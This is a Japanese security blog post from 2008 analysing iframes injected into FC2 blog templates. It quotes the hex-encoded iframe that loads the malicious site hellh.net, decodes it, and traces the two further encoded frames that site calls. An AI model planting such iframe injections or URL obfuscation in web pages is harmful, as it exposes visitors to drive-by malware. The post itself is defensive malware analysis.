ハルコタン紀行

hellh.netその1

いくつかのFC2ブログのテンプレートにまたiframe(インラインフレーム)が仕掛けられていたそうです。サイズ指定は省略します。
<iframe src="http://%77%77%77%2E%68%65%6C%6C%68%2E%6E%65%74/"></iframe>
今回はエンコードされています。
%~というのは16進数で、ASCII(文字コード)を意味しています。
たとえば以下は同じGoogleにアクセスします。
http://www.google.co.jp/
http://%77%77%77%2e%67%6f%6f%67%6c%65%2e%63%6f%2e%6a%70/
文字コード表とにらめっこしてもツールを使ってもかまいませんが、URI Decoderなどで検索してコピペするのが楽でしょう。
<iframe src="http://www.hellh.net/"></iframe>
pingを飛ばすとdda3.netと同じホストとわかります。
もう結果はわかっていますがとりあえずwhoisします。
Creation Date:2008-03-08
Country:China

フレームの構成はdda3.netとあまりかわりません。
Default.htmがiframeで以下の2つのフレームを呼び出します。
なお、この呼び出しのiframeもエンコードされています。
http://%77%77%77%2E%68%65%6C%6C%68%2E%6E%65%74/%69%6E%64%65%78%2E%68%74%6D
http://%77%77%77%2E%68%65%6C%6C%68%2E%6E%65%74/%72%65%2E%68%74%6D
デコードします。
http://www.hellh.net/index.htm
http://www.hellh.net/re.htm

続きます。

メモ:
エンコードされると面倒だ!
%21%22%23%24%25はそれぞれ!"#$%となっていて、キーボードの数字の並びと同じ! ふしぎ!
%20はブランクです。

テーマ:セキュリティ - ジャンル:コンピュータ

  1. 2008/03/13(木) 23:58:36|
  2. ウイルス
  3. | トラックバック:0
  4. | コメント:0
<<dda3.netその2 | ホーム | dda3.netその1>>

コメント

コメントの投稿


管理者にだけ表示を許可する

トラックバック

トラックバック URL
http://ilion.blog47.fc2.com/tb.php/4-4b94816f
この記事にトラックバックする(FC2ブログユーザー)